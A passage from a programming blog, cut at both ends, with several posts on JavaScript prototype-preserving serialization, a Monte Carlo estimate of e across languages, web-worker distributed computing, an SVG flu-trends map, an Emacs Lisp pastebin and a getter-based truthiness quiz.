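    attack: function() { return 'bash'; }
};

JSON.stringify(monster);
// => '{"name":"brute"}'

JSON.stringify([function() {}]);
// => '[null]'

JSON.stringify(function() {});
// => undefined
```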

Fortunately for my purposes I don’t actually need to serialize any objects with methods directly attached. I only need to ensure the __proto__ property points at the right prototype before I start using the object.

// Setting __proto__ directly:

foo2.__proto__ = Foo.prototype;
foo2.greet();
// => "hello"

// Or if your implementation doesn't support __proto__ (IE):

var foo3 = Object.create(Foo.prototype);
for (var p in foo2) {
    if (foo2.hasOwnProperty(p)) {
        foo3[p] = foo2[p];
    }
}
foo3.greet();
// => "hello"

Of course this one was really easy because there was only one prototype in my example. If we deserialize an arbitrary object how do we know which prototype to connect it to? We could attach this information to the object before serializing it. We can’t store the prototype itself because we’d run into the same problem as before. Instead, we want to attach the name of the prototype. When the object is restored we can use the name to look up the appropriate prototype. Prototypes themselves don’t have names but constructors generally do.

foo1.constructor.name;
// => "Foo"

I’m going to stuff this name in the "#" property of the object, a name that is unlikely to be used. A longer name has a better chance of avoiding a collision, but since I’m putting this in localStorage, and every stored object gets this field, I want to keep it short.

function serialize(object) {
    object['#'] = object.constructor.name;
    return JSON.stringify(object);
}

function deserialize(string) {
    var object = JSON.parse(string);
    object.__proto__ = window[object['#']].prototype;
    return object;
}

var string = serialize(new Foo());
// string === "{\"#\":\"Foo\"}"

deserialize(string).greet();
// => "hello"

To look up the prototype I check for a global variable of that name on the global object, which in this case is window. This places one important restriction on how I use my serializer: all constructors must have names and must be assigned to the corresponding global variable. Being a prototype language this isn’t necessarily the case!

(function() {
    var Bar = function Quux() {};
    var bar = new Bar();
    return bar.constructor.name;
}());
// => "Quux"

Here, the Bar/Quux prototype isn’t global nor does the attached name (Quux) match the name I used with new (Bar). If bar was serialized there would be no way to get a hold of its prototype.

So the two constraints so far are:

I need to consistently name my prototypes and store them in global variables.
I must never store a function in the property of any object I want to serialize.

Before I started on this today I was actually violating both of these rules. It took a small amount of refactoring to meet these conditions. Those people trying to be clever by using closures to hide private fields on their objects will ultimately get stuck on the second constraint.

To be useful, I need to recursively enter arrays and objects, attaching prototype information to any other objects I come across. This introduces one last constraint: no object can be reachable more than once from my root object. If an object appears more than once, it will be serialized twice and duplicated in the data structure when deserialized. Worse, if I make a circular reference my serialization function will never return.
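A recursive version might look something like the sketch below. It is not my actual save code: tag and restore are hypothetical names, the constructors are passed in as a lookup table instead of being read from window, and Object.setPrototypeOf() stands in for assigning __proto__. As described above, it duplicates shared objects and never returns on circular structures.

```javascript
// Recursively stamp every non-array object with its constructor's name.
function tag(value) {
    if (value !== null && typeof value === 'object') {
        if (!Array.isArray(value)) {
            value['#'] = value.constructor.name;
        }
        Object.keys(value).forEach(function(key) {
            tag(value[key]);
        });
    }
    return value;
}

// Recursively relink prototypes using a table of name -> constructor.
function restore(value, constructors) {
    if (value !== null && typeof value === 'object') {
        var name = value['#'];
        if (Object.prototype.hasOwnProperty.call(constructors, name)) {
            Object.setPrototypeOf(value, constructors[name].prototype);
        }
        Object.keys(value).forEach(function(key) {
            restore(value[key], constructors);
        });
    }
    return value;
}

function Item(kind) { this.kind = kind; }
Item.prototype.describe = function() { return 'a ' + this.kind; };

function Monster(name) {
    this.name = name;
    this.items = [new Item('disc')];
}
Monster.prototype.greet = function() { return 'I am ' + this.name; };

var saved = JSON.stringify(tag(new Monster('brute')));
var loaded = restore(JSON.parse(saved), {Monster: Monster, Item: Item});
loaded.greet();
// => "I am brute"
loaded.items[0].describe();
// => "a disc"
```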

To deal with this the serializer would need to keep track of what objects it has seen and, when an object is seen again, a reference is emitted instead. The deserializer, after reading in the entire structure, would need to replace these references with the right object. Fortunately for my roguelike no single object appears more than once in my core data structure, so I don’t need to worry about this.
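The reference-tracking idea can be sketched roughly as follows. This is not what save.js does (it doesn't need to), and the function names and the "$ref" marker are made up for illustration. It also assumes the root is an object or array and ignores prototypes entirely.

```javascript
// Flatten an object graph into a table; every object becomes {"$ref": id}.
function encodeGraph(root) {
    var seen = [];   // original objects, position = id
    var table = [];  // flattened copies, position = id
    function visit(value) {
        if (value === null || typeof value !== 'object') {
            return value;  // primitives pass through untouched
        }
        var id = seen.indexOf(value);
        if (id < 0) {
            id = seen.length;
            seen.push(value);
            var copy = Array.isArray(value) ? [] : {};
            table[id] = copy;  // register before recursing, so cycles end
            Object.keys(value).forEach(function(key) {
                copy[key] = visit(value[key]);
            });
        }
        return {'$ref': id};
    }
    visit(root);
    return JSON.stringify(table);
}

// Read the whole table first, then swap references for real objects.
function decodeGraph(string) {
    var table = JSON.parse(string);
    table.forEach(function(object) {
        Object.keys(object).forEach(function(key) {
            var value = object[key];
            if (value !== null && typeof value === 'object') {
                object[key] = table[value.$ref];
            }
        });
    });
    return table[0];
}
```

The linear indexOf() search keeps the sketch short; it would be slow for a large game state.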

After discussing all this with Gavin he did a search and found HydrateJS, a JavaScript library to do exactly all this, including the object reference stuff I didn’t need. Unfortunately this library turned out to be way too buggy for me to use. Objects returned by the parser can’t be properly serialized again, so I couldn’t save, load, and save again.

I ended up writing my own functions to do what I needed: save.js. It’s not as capable as HydrateJS intends to be, but it does everything I need, and my entire game state can safely go back and forth between load and save arbitrarily many times. Most of the complexity comes from just figuring out exactly what type a particular thing is. This is frustratingly non-trivial in JavaScript.

It was really neat to see all this working so smoothly once I got it in place. When I started my roguelike I wasn’t sure if I could pull off load/restore properly. You can see this system in action right now at the play link at the top of the post. Play a little bit, close the tab, then visit the page again. It should restore your game (note: IE unsupported).

I might rip my serialization stuff out into its own library when I’m done. I bet I’ll find it useful again.

Fast Monte Carlo Method with JavaScript

2013-02-25T00:00:00Z

On average, how many random numbers drawn from [0, 1] must be added together for the sum to exceed 1?

If you want to figure it out for yourself, stop reading now and come back when you’re done.

The answer is e. When I came across this question I took the lazy programmer route and, rather than work out the math, I estimated the answer using the Monte Carlo method. I used the language I always use for these scratchpad computations: Emacs Lisp. All I need to do is switch to the *scratch* buffer and start hacking. No external program needed.
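For anyone who does want the math, here is a short sketch of the standard argument. The notation is introduced just for this aside: N is the number of draws needed and the U_i are the independent uniform draws. The sum of the first n draws stays at or below 1 with probability 1/n! (the volume of the corresponding simplex), and the expected value follows by summing those tail probabilities.

```latex
P(N > n) = P(U_1 + \cdots + U_n \le 1) = \frac{1}{n!},
\qquad
E[N] = \sum_{n=0}^{\infty} P(N > n) = \sum_{n=0}^{\infty} \frac{1}{n!} = e
```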

The downside is that Elisp is incredibly slow. Fortunately, Elisp is so similar to Common Lisp that porting to it is almost trivial. My preferred Common Lisp implementation, SBCL, is very, very fast so it’s a huge speed upgrade with little cost, should I need it. As far as I know, SBCL is the fastest Common Lisp implementation.

Even though Elisp was fast enough to determine that the answer is probably e, I wanted to play around with it. This little test program doubles as a way to estimate the value of e, similar to estimating pi. The more trial runs I give it the more accurate my answer will get — to a point.

Here’s the Common Lisp version. (I love the loop macro, obviously.)

(defun trial ()
  (loop for count upfrom 1
     sum (random 1.0) into total
     until (> total 1)
     finally (return count)))

(defun monte-carlo (n)
  (loop repeat n
     sum (trial) into total
     finally (return (/ total 1.0 n))))

Using SBCL 1.0.57.0.debian on an Intel Core i7-2600 CPU, once everything’s warmed up this takes about 9.4 seconds with 100 million trials.

(time (monte-carlo 100000000))
Evaluation took:
  9.423 seconds of real time
  9.388587 seconds of total run time (9.380586 user, 0.008001 system)
  99.64% CPU
  31,965,834,356 processor cycles
  99,008 bytes consed
2.7185063

Since this makes for an interesting benchmark I gave it a whirl in JavaScript,

function trial() {
    var count = 0, sum = 0;
    while (sum <= 1) {
        sum += Math.random();
        count++;
    }
    return count;
}

function monteCarlo(n) {
    var total = 0;
    for (var i = 0; i < n; i++) {
        total += trial();
    }
    return total / n;
}

I ran this on Chromium 24.0.1312.68 Debian 7.0 (180326) which uses V8, currently the fastest JavaScript engine. With 100 million trials, this only took about 2.7 seconds!

monteCarlo(100000000); // ~2.7 seconds, according to Skewer
// => 2.71850356

Whoa! It beat SBCL! I was shocked. Let’s try using C as a baseline. Surely C will be the fastest.

#include <stdio.h>
#include <stdlib.h>

int trial() {
    int count = 0;
    double sum = 0;
    while (sum <= 1.0) {
        sum += rand() / (double) RAND_MAX;
        count++;
    }
    return count;
}

double monteCarlo(int n) {
    int i, total = 0;
    for (i = 0; i < n; i++) {
        total += trial();
    }
    return total / (double) n;
}

int main() {
    printf("%f\n", monteCarlo(100000000));
    return 0;
}

I used the highest optimization setting on the compiler.

$ gcc -ansi -W -Wall -Wextra -O3 temp.c
$ time ./a.out
2.718359

real	0m3.782s
user	0m3.760s
sys	0m0.000s

Incredible! JavaScript was faster than C! That was completely unexpected.

The Circumstances

Both the Common Lisp and C code could probably be carefully tweaked to improve performance. In Common Lisp’s case I could attach type information and turn down safety. For C I could use more compiler flags to squeeze out a bit more performance. Then maybe they could beat JavaScript.

In contrast, as far as I can tell the JavaScript code is already as optimized as it can get. There just aren’t many knobs to tweak. Note that minifying the code will make no difference, especially since I’m not measuring the parsing time. Except for the functions themselves, the variables are all local, so they are never “looked up” at run-time. Their name length doesn’t matter. Remember, in JavaScript global variables are expensive, because they’re (generally) hash table lookups on the global object at run-time. For any decent compiler, local variables are basically precomputed memory offsets — very fast.

The function names themselves are global variables, but the V8 compiler appears to eliminate this cost (inlining?). Wrapping the entire thing in another function, turning the two original functions into local variables, makes no difference in performance.
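A sketch of what that wrapped variant could look like, with a crude timer bolted on. The timer is an assumption for illustration (Date.now() only has millisecond resolution), and the trial count is cut down so it finishes quickly.

```javascript
var result = (function() {
    // Both functions are now local variables of the wrapper.
    function trial() {
        var count = 0, sum = 0;
        while (sum <= 1) {
            sum += Math.random();
            count++;
        }
        return count;
    }

    function monteCarlo(n) {
        var total = 0;
        for (var i = 0; i < n; i++) {
            total += trial();
        }
        return total / n;
    }

    var start = Date.now();
    var estimate = monteCarlo(1000000);
    return {estimate: estimate, seconds: (Date.now() - start) / 1000};
}());
```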

While Common Lisp and C may be able to beat JavaScript if time is invested in optimizing them — something to be done rarely — in a casual implementation of this algorithm, JavaScript beats them both. I find this really exciting.

JavaScript "Map With This"

2013-02-07T00:00:00Z

JavaScript has a handy map() function for mapping a function across the elements of an array, producing a new array. It’s part of JavaScript’s functional side.

[1, 2, 3, 4, 5].map(function(x) { return x * x; });
// => [1, 4, 9, 16, 25]

Each array element is passed as the first argument to the function. (Unfortunately, it also passes two more arguments: the element’s index and the array itself, but I’m not using those here.) However, I sometimes find myself wishing there was a map-like function that used the element as the context of the function. Then I could apply a method to each of the elements in the array rather than be limited to functions.

It’s JavaScript so this could be added by adding a new map-like method on the Array prototype, but these sorts of extensions are bad practice. Fortunately, there’s a clean way to do this by building on the map() method. Here’s a function that produces an adaptor function, which translates the arguments of a provided function into a modified call to the provided function.

function withThis(f) {
    var args = Array.prototype.slice.call(arguments, 1);
    return function(object) {
        return f.apply(object, args);
    };
}

Here, withThis() takes a variadic function and some arguments, returning a new function that accepts one additional argument on the left and partially applies the provided function to the provided arguments. The first argument on the new function is used as the context of a call to the provided function. Here’s an example,

[1, 2, 3].map(withThis(Number.prototype.toFixed, 2));
// => ["1.00", "2.00", "3.00"]

The expression withThis(Number.prototype.toFixed, 2) returns a non-method version of toFixed(), partially applied to 2, which operates on its first argument rather than this. It’s well-suited to be passed to map() or filter().

One downside to this is that it’s not polymorphic; it doesn’t dispatch on the type of the element. This can be fixed,

function withThis(f) {
    var args = Array.prototype.slice.call(arguments, 1);
    return function(object) {
        return object[f].apply(object, args);
    };
}

[1, new Date(), [1, 2, 3]].map(withThis('toString'));
// => ["1", "Thu Feb 07 2013 17:08:46 GMT-0500 (EST)", "1,2,3"]

It’s also easier to call. Here’s the same toFixed() example.

[1, 2, 3].map(withThis('toFixed', 2));
// => ["1.00", "2.00", "3.00"]

I haven’t tested it yet, but I’d bet the second version of withThis() is a lot slower. It has to look up the actual method using the string at run time when, in the first version, the identifier is established at compile time. If this is the case, here’s a final version that does the right thing depending on what type of argument is provided.

function withThis(f) {
    var args = Array.prototype.slice.call(arguments, 1);
    if (typeof f === 'string') {
        return function(object) {
            return object[f].apply(object, args);
        };
    } else {
        return function(object) {
            return f.apply(object, args);
        };
    }
}
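To tie it together, here is a short usage sketch of that final version. It repeats the definition so it can run on its own, and also shows what goes wrong when a method is handed to map() directly, which is the problem withThis() works around.

```javascript
function withThis(f) {
    var args = Array.prototype.slice.call(arguments, 1);
    if (typeof f === 'string') {
        return function(object) {
            return object[f].apply(object, args);
        };
    } else {
        return function(object) {
            return f.apply(object, args);
        };
    }
}

// Both calling styles give the same result.
var byName = [1, 2, 3].map(withThis('toFixed', 2));
var byFunction = [1, 2, 3].map(withThis(Number.prototype.toFixed, 2));

// It also works with filter(): keep strings that aren't all whitespace.
var nonBlank = ['a', '  ', 'b'].filter(withThis('trim'));

// Passing the method itself fails, since map() doesn't supply a number
// as the context.
var failure = null;
try {
    [1, 2, 3].map(Number.prototype.toFixed);
} catch (e) {
    failure = e.name;
}
```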

Web Distributed Computing Revisited

2013-01-26T00:00:00Z

Four years ago I investigated the idea of using browsers as nodes for distributed computing. I concluded that due to the platform’s constraints there were few problems that it was suited to solve. However, the situation has since changed quite a bit! In fact, this weekend I made practical use of web browsers across a number of geographically separated computers to solve a computational problem.

What changed?

Web workers came into existence, not just as a specification but as an implementation across all the major browsers. They allow JavaScript to be run in an isolated, dedicated background thread. This eliminates the setTimeout() requirement from before, which not only caused a performance penalty but really hampered running any sort of lively interface alongside the computation. The interface and computation were competing for time on the same thread.

The worker isn’t entirely isolated; otherwise it would be useless for anything but wasting resources. As pubsub events, it can pass structured clones to and from the main thread running in the page. Other than this, it has no access to the DOM or other data on the page.

The interface is a bit unfriendly to live development, but it’s manageable. It’s invoked by passing the URL of a script to the constructor. This script is the code that runs in the dedicated thread.

var worker = new Worker('script/worker.js');

The sort of interface that would have been more convenient for live interaction would be something like what is found on most multi-threaded platforms: a thread constructor that accepts a function as an argument.

/* This doesn't work! */
var worker = new Worker(function() {
    // ...
});

I completely understand why this isn’t the case. The worker thread needs to be totally isolated and the above example is insufficient. I’m passing a closure to the constructor, which means I would be sharing bindings, and therefore data, with the worker thread. This interface could be faked using a data URI and taking advantage of the fact that most browsers return function source code from toString().
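The data URI trick might look something like this sketch. The helper names workerSource() and spawn() are hypothetical, and it assumes the browser permits workers to be started from data URIs. Only the function's source text makes the trip, so the function can't refer to any variables outside itself.

```javascript
// Build a self-invoking script from a function's source text.
function workerSource(fn) {
    return '(' + fn.toString() + ')();';
}

// Start a worker whose script is the given function (browser only).
function spawn(fn) {
    var uri = 'data:text/javascript,' +
        encodeURIComponent(workerSource(fn));
    return new Worker(uri);
}

// Usage, in a browser:
//
// var worker = spawn(function() {
//     self.onmessage = function(event) {
//         self.postMessage(event.data * 2);
//     };
// });
// worker.onmessage = function(event) { console.log(event.data); };
// worker.postMessage(21);
```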

Another difficulty is libraries. I initially assumed that, ignoring the stupid idea of passing code through the event API and evaling it, that single URL had to contain all the source code the worker will use as one script, so that any libraries would need to be concatenated with the worker script.

That turns out not to be the case. Libraries can be loaded by the worker with the importScripts() function, so not everything needs to be packed into one script. Furthermore, workers can make HTTP requests with XMLHttpRequest, so that data don’t need to be embedded either. Note that it’s probably worth making these requests synchronously (third argument false), because blocking isn’t an issue in workers.

The other big change was the effect Google Chrome, especially its V8 JavaScript engine, had on the browser market. Browser JavaScript is probably about two orders of magnitude faster than it was when I wrote my previous post. It’s incredible what the V8 team has accomplished. If written carefully, V8 JavaScript performance can beat out most other languages.

Finally, I also now have much, much better knowledge of JavaScript than I did four years ago. I’m not fumbling around like I was before.

Applying these Changes

This weekend’s Daily Programmer challenge was to find a “key” — a permutation of the alphabet — that when applied to a small dictionary results in the maximum number of words with their letters in alphabetical order. That’s a keyspace of 26!, or 403,291,461,126,605,635,584,000,000.
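To make the scoring concrete, here is a sketch under one reading of the challenge: the key defines a new alphabet ordering, and a word counts when its letters never go backward in that ordering. The function names are hypothetical and this isn't the code from key-collab.

```javascript
// True if the word's letters are in non-decreasing order by rank.
function isSorted(word, rank) {
    for (var i = 1; i < word.length; i++) {
        if (rank[word[i - 1]] > rank[word[i]]) {
            return false;
        }
    }
    return true;
}

// Count the words that are "alphabetical" under the given key.
function scoreKey(key, words) {
    var rank = {};
    for (var i = 0; i < key.length; i++) {
        rank[key[i]] = i;  // position of each letter in the key
    }
    return words.filter(function(word) {
        return isSorted(word, rank);
    }).length;
}

var words = ['almost', 'billowy', 'zebra'];
scoreKey('abcdefghijklmnopqrstuvwxyz', words);  // => 2
scoreKey('zebracdfghijklmnopqstuvwxy', words);  // => 3
```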

When I’m developing, I use both a laptop and a desktop simultaneously, and I really wanted to put them both to work searching that huge space for good solutions. Initially I was going to accomplish this by writing my program in Clojure and running it on each machine. But what about involving my wife’s computer, too? I wasn’t going to bother her with setting up an environment to run my stuff. Writing it in JavaScript as a web application would be the way to go. To coordinate this work I’d use simple-httpd. And so it was born,

https://github.com/skeeto/key-collab

Here’s what it looks like in action. Each tab open consumes one CPU core, allowing users to control their commitment by choosing how many tabs to keep open. All of those numbers update about twice per second, so users can get a concrete idea of what’s going on. I think it’s fun to watch.

(I’m obviously a fan of blues and greens on my web pages. I don’t know why.)

I posted the server’s URL on reddit in the challenge thread, so various reddit users from around the world joined in on the computation.

Strict Mode

I had an accidental discovery with strict mode and Chrome. I’ve always figured using strict mode had an effect on the performance of code, but had no idea how much. From the beginning, I had intended to use it in my worker script. Being isolated already, there are absolutely no downsides.

However, while I was developing and experimenting I accidentally turned it off and left it off. It was left turned off for a short time in the version I distributed to the clients, so I got to see how things were going without it. When I noticed the mistake and uncommented the "use strict" line, I saw a 6-fold speed boost in Chrome. Wow! Just making those few promises to Chrome allowed it to make some massive performance optimizations.
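For a sense of what those promises are, here is a small sketch of one of them: in strict code, assigning to a variable that was never declared is an error rather than the quiet creation of a global. Whether this particular restriction accounts for the speedup isn't something the example shows. The variable name is arbitrary.

```javascript
function strictAssign() {
    'use strict';
    try {
        undeclaredCounter = 1;  // never declared anywhere
        return 'assigned';
    } catch (e) {
        return e.name;
    }
}

var outcome = strictAssign();  // => "ReferenceError"
```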

With Chrome moving at full speed, it was able to inspect 560 keys per second on Brian’s laptop. I was getting about 300 keys per second on my own (less-capable) computers. I haven’t been able to get anything close to these speeds in any other language/platform (but I didn’t try in C yet).

Furthermore, I got a noticeable speed boost in Chrome by using proper object oriented programming, versus a loose collection of functions and ad-hoc structures. I think it’s because it made me construct my data structures consistently, allowing V8’s hidden classes to work their magic. It also probably helped the compiler predict type information. I’ll need to investigate this further.

Use strict mode whenever possible, folks!

What made this problem work?

Having web workers available was a big help. However, this problem met the original constraints fairly well.

It was low bandwidth. No special per-client instructions were required. The client only needed to report back a 26-character string.
There was no state to worry about. The original version of my script tried keys at random. The later version used a hill-climbing algorithm, so there was some state but it was only needed for a few seconds at a time. It wasn’t worth holding onto.
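The hill-climbing idea can be sketched like so, assuming the same reading of the challenge as before (the key is an alphabet ordering). The names and the swap-two-letters move are assumptions for illustration, not necessarily what the worker script does.

```javascript
// Count words whose letters never go backward in the key's ordering.
function score(key, words) {
    return words.filter(function(word) {
        for (var i = 1; i < word.length; i++) {
            if (key.indexOf(word[i - 1]) > key.indexOf(word[i])) {
                return false;
            }
        }
        return true;
    }).length;
}

// Return a copy of key with the letters at i and j exchanged.
function swap(key, i, j) {
    var letters = key.split('');
    var tmp = letters[i];
    letters[i] = letters[j];
    letters[j] = tmp;
    return letters.join('');
}

// Try random swaps, keeping any that don't lower the score.
function hillClimb(key, words, steps) {
    var best = score(key, words);
    for (var n = 0; n < steps; n++) {
        var i = Math.floor(Math.random() * key.length);
        var j = Math.floor(Math.random() * key.length);
        var candidate = swap(key, i, j);
        var s = score(candidate, words);
        if (s >= best) {
            key = candidate;
            best = s;
        }
    }
    return {key: key, score: best};
}
```

The only state is the current key and its score, which is why a client can throw it away and start over from a fresh random key at any time.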

This project was a lot of fun so I hope I get another opportunity to do it again in the future, hopefully with a lot more nodes participating.

Flu Trends Timeline

2013-01-13T00:00:00Z

This past week I came across this CSV-formatted data from Google. It’s search engine trends for searches about the flu for different parts of the US.

http://www.google.org/flutrends/us/data.txt

I thought it would be interesting to display this data on a map with a slider along the bottom to select the date. Here’s the result of spending two hours doing just that. I’m really happy with how it turned out, and, further, I picked up a few new tricks from the process.

Flu Trends Timeline (GitHub)

You probably noticed there was a spinner when you first opened the page. This is because it’s asynchronously fetching the latest data.txt from Google. However, since it’s a cross-origin request, and I don’t control the server headers (static hosting), it’s using AnyOrigin.com to translate it into a JSONP request. That’s a really handy service!

To parse the CSV format, I’m using jquery-csv. I wouldn’t mention it except that it has a really cool feature I haven’t seen in any other CSV parser: instead of reading the text into a two-dimensional array (which would need to be “parsed” further), it can read in each row as an object, using the CSV header line as the properties. This is the toObjects() function. It makes it feel like reading straightforward JSON. For example,

name,color,weight
apple,red,1.2
banana,yellow,1.6
orange,orange,0.9

will be parsed into this JavaScript structure,

[{name:"apple",  color:"red",    weight:"1.2"},
 {name:"banana", color:"yellow", weight:"1.6"},
 {name:"orange", color:"orange", weight:"0.9"}]

With the flu data, it means each returned object is a single date snapshot, just what I need. The only data-massaging I had to do was mapping over each object to convert the date string into a proper Date object.
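To show the shape of that processing without pulling in the library, here is a naive stand-in. It is not jquery-csv: it only handles unquoted fields, and the column names and sample values are invented.

```javascript
// Naive sketch: header-keyed rows from simple, unquoted CSV text.
function toObjects(text) {
    var lines = text.trim().split(/\r?\n/);
    var header = lines[0].split(',');
    return lines.slice(1).map(function(line) {
        var fields = line.split(',');
        var row = {};
        header.forEach(function(name, i) {
            row[name] = fields[i];
        });
        return row;
    });
}

var csv = 'date,weight\n2013-01-06,1.2\n2013-01-13,1.6';

// The one bit of massaging: turn the date string into a Date.
var rows = toObjects(csv).map(function(row) {
    row.date = new Date(row.date);  // ISO date strings parse as UTC
    return row;
});
```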

Using two neat tricks I’ve got the latest data parsed into my desired data structure. Next up is displaying a map. At first I wasn’t sure how to do this cleanly but then I remembered an old DailyProgrammer problem: #89, Coloring the United States of America. SVG maps tend to contain metadata describing what shape is what. In this case, each state shape’s id attribute has the two-letter state code. Even more, SVG plays very, very well with JavaScript. It can be manipulated as part of the DOM, using the same API, including jQuery. It also uses CSS for styling.

The tricky part is actually accessing the SVG’s document root. To do this, it can’t be included as an img tag. Otherwise it’s an opaque raster image as far as JavaScript is concerned. It either needs to be embedded into the HTML — a dirty mix of languages that should be avoided — or accessed through an asynchronous request. Accessing remote XML was the original purpose of asynchronous browser requests, after all (i.e. the poorly-named XMLHttpRequest object). I can host this SVG from my own server, so this isn’t an issue like the CSV data.
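Once the SVG document root is in hand, coloring the map comes down to looking up each shape by its state code. A rough sketch, with made-up function names and an arbitrary white-to-red scale, where snapshot is assumed to map state codes to numbers:

```javascript
// Map a value in [0, max] onto a white-to-red fill color.
function colorFor(value, max) {
    var level = Math.round(255 * (1 - Math.min(value / max, 1)));
    return 'rgb(255,' + level + ',' + level + ')';
}

// svgRoot is the SVG document, e.g. responseXML from an XMLHttpRequest.
function paintStates(svgRoot, snapshot, max) {
    Object.keys(snapshot).forEach(function(code) {
        var shape = svgRoot.getElementById(code);
        if (shape) {  // skip columns that aren't states on the map
            shape.style.fill = colorFor(snapshot[code], max);
        }
    });
}
```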

HTML doesn’t have a slider input, unfortunately, so for the slider I’m using the jQuery UI Slider. I’m not terribly impressed with it but it gets the job done. Even before I had the slider connected, I could change the display date on the fly from Emacs using Skewer.

Compared to my initial expectations, this project turned out to be surprisingly well suited to HTML and JavaScript. Being able to manipulate SVG on the fly is really powerful and I doubt there’s an easier platform on which to do it than the browser.

An Emacs Pastebin

2012-12-29T00:00:00Z

Luke is doing an interesting five-part tutorial on writing a pastebin in PHP: PHP Like a Pro (2, 3, 4, 5). The tutorial is largely an introduction to the set of tools a professional would use to accomplish a more involved project, the most interesting of which, for me, is Vagrant.

Because I have no intention of ever using PHP, I decided to follow along in parallel with my own version. I used Emacs Lisp with my simple-httpd package for the server. I really like my servlet API, so it was a lot more fun than I expected it to be! Here’s the source code,

https://github.com/skeeto/emacs-pastebin

Here’s what it looked like once I was all done,

It has syntax highlighting, paste expiration, and light version control. The server side is as simple as possible, consisting of only three servlets,

/pastebin/: static files
/pastebin/get: serves (immutable) pastes in JSON
/pastebin/post: accepts new pastes in JSON, returns the ID

A paste’s JSON is the raw paste content plus some metadata, including post date, expiration date, language (highlighting), parent paste ID, and title. That’s it! The server is just a database and static file host. It performs no dynamic page generation. Instead, the client-side JavaScript does all the work.

For you non-Emacs users, the repository has a pastebin-standalone.el which can be used to launch a standalone instance of the pastebin server, so long as you have Emacs on your computer. It will fetch any needed dependencies automatically. See the header comment of this file for instructions.

IDs

A paste ID is four or more randomly-generated numbers, letters, dashes or underscores, with some minor restrictions (pastebin-id-valid-p). It’s appended to the end of the servlet URL.

/pastebin/<id>
/pastebin/get/<id>

In the first case, the servlet entirely ignores the ID. Its job is only to serve static files. In the second case the server looks up the ID in the database and returns the paste JSON.

The client-side inspects the page’s URL to determine the ID currently being viewed, if any. It performs an asynchronous request to /pastebin/get/ to fetch the paste and insert the result, if found, into the current page.

Form submission isn’t done the normal way. Instead, the submission is intercepted by an event handler, which wraps the form data up in JSON (much cleaner to parse!) and sends it asynchronously to /pastebin/post via POST. This servlet inserts the paste in the database and responds in text/plain with the paste ID it generated. The client-side then redirects the browser to the paste URL for that paste.
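The two pure pieces of that client-side flow can be sketched as below. The function names and the JSON field names are hypothetical, and the pattern only encodes the basic ID alphabet, not the extra restrictions in pastebin-id-valid-p.

```javascript
// Extract the paste ID, if any, from a path such as "/pastebin/Ab3_".
function idFromPath(path) {
    var match = /^\/pastebin\/([A-Za-z0-9_-]{4,})$/.exec(path);
    return match ? match[1] : null;
}

// Wrap the form fields up as JSON for the POST body.
function encodePaste(fields) {
    return JSON.stringify({
        title: fields.title,
        language: fields.language,
        content: fields.content,
        parent: fields.parent || null  // null when there is no parent
    });
}

idFromPath('/pastebin/Ab3_');  // => "Ab3_"
idFromPath('/pastebin/');      // => null
```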

Features

As I said, the server performs no page generation, so syntax highlighting is done in the client with highlight.js. I could have used htmlize and supported any language that Emacs supports. However, I wanted to keep the server as simple as possible, and, more importantly, I really don’t trust Emacs’ various modes to be secure in operating on arbitrary data. That’s a huge attack surface and these modes were written without security in mind (fairly reasonable). It’s actually a deliberate feature for Emacs to automatically eval Elisp in comments under certain circumstances.

Version control is accomplished by keeping track of which paste was the parent of the paste being posted. When viewing a paste, the content is also placed in a textarea for editing. Submitting this form will create a new paste with the current paste as the parent. When viewing a paste that has a parent, a “diff” option is provided to view a diff patch of the current paste with its parent (see the screenshot above). Again, the server is dead simple, so this patch is computed by JavaScript after fetching the parent paste from the server.

Databases

As part of my fun I made a generic database API for the servlets, then implemented three different database backends. I used eieio, Emacs Lisp’s CLOS-like object system, to implement this API. Creating a new database backend is just a matter of making a new class that implements two specific methods.

The first, and default, implementation uses an Elisp hash table for storage, which is lost when Emacs exits.

The second is a flat-file database. I estimate it should be able to support at least 16 million different pastes gracefully. The on-disk format for pastes is an s-expression. Basically, this is read by Emacs, expiration date checked, converted to JSON, then served to the client.

To my great surprise there is practically no support for programmatic access to a SQL database from GNU Emacs Lisp (other Emacsen do). The closest I found was pg.el, which is asynchronous by necessity. However, the specific target I had in mind was SQLite.

I did manage to implement a third backend that uses SQLite, but it’s a big hack. It invokes the sqlite3 command line program once for every request, asking for a response in CSV, the only output format that seems to escape unambiguously. This response then has to be parsed, which works so long as it isn’t long enough to blow the regex stack.

Update February 2014: I have found a solution to this problem!

Future

This has been an educational project for me. As a tutorial and for practice I’ll probably write the server again from scratch using other languages and platforms (Node.js and Hunchentoot maybe?), keeping the same front-end.

JavaScript Truthiness Quiz

2012-11-28T00:00:00Z

I’ve got another quirky JavaScript quiz for you. This one has two different answers.

function foo(object) {
    object.bar = false;
    return object.bar && true;
}

foo(___); // Fill in an argument such that foo() returns true.

Obviously a normal object won’t do the job. Something more special is needed.

foo({bar: true});  // => false

The fact that foo() can return true could introduce a bug during refactoring: the code initially appears to be a tautology that could be reduced to a simpler return false. Since this quiz has solutions that’s obviously not true.

Had I reversed the booleans — assign bar to true and make this function return a falsy value — then almost any immutable object, such as a string, would do.

function foo2(object) {
    object.bar = true;  // inverse
    return object.bar && true;
}

foo2("baz");  // => undefined

The bar assignment would fail and attempting to access it would return undefined, which is falsy.

Answer

The two approaches are getters and property descriptors.

Getters

JavaScript directly supports getter and setter properties. Without special language support, such accessors could be accomplished with plain methods (like Java).

var lovesBlue = {
    _color: "blue",  // private

    getColor: function() {
        return this._color;
    },

    /* Only blue colors are allowed! */
    setColor: function(color) {
        if (/blue/.test(color)) {
            this._color = color;
        }
        return this._color;
    }
};

lovesBlue.getColor();              // => "blue"
lovesBlue.setColor("red");         // => "blue" (set fails)
lovesBlue.setColor("light blue");  // => "light blue"

JavaScript allows properties themselves to transparently run methods, such as to enforce invariants, even though it’s not an obvious call site. This is how many of the browser environment objects work. There’s a special syntax with get and set keywords. (Keep this in mind, JSON parser writers!)

var lovesBlue = {
    _color: "blue",

    get color() {
        return this._color;
    },

    set color(color) {
        if (/blue/.test(color)) {
            this._color = color;
        }
    }
};

lovesBlue.color = "red";  // => "red", but assignment fails
lovesBlue.color;          // => "blue"

This can be used to solve the quiz,

foo({get bar() { return true; }});

Because bar is a getter with no associated setter, there’s effectively no assigning values to bar and it always evaluates to true.

Property descriptors

Object properties themselves have properties, called descriptors, governing their behavior. The accessors above are examples of the descriptors get and set. For our situation there’s a writable descriptor which determines whether or not a particular property can be assigned. If you really wanted to lock this in, there’s even a metadescriptor (a metametaproperty?), configurable, that determines whether or not a property’s descriptors, including itself, can be modified.

